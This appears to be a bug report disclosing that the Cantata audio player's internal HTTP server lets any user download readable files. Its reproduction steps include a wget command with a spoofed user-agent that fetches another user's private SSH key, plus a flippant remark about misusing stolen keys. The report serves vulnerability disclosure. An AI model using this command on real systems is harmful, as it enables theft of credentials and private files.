This is so obvious mistake (or not well hidden backdoor?), did not expect it to 
exist here.
By default cantata listens to external network interface and lets anyone 
download any readable file. It is not possible to disable internal http server, 
the most "secure" thing to do is to let it listen only "lo" interface. Internal 
http server should be removed, this is not something, that audio player should 
have. And users sure do not expect such "features".

What steps will reproduce the problem?
1. Start cantata as user "me" and play some file using internal http server.
2. Run as user "not-me":
netstat -tuna|grep LISTEN
3. Now we know port and ip. Run as user "not-me":
wget --user-agent='Music Player Daemon 0.17.4' 
"http://127.0.0.1:37420/home/me/.ssh/id_rsa?cantata=song" -O id_rsa
4. Do something fun with passwords, keys or any other data.

What version of the product are you using? On what operating system?
1.2.1, Gentoo Linux amd64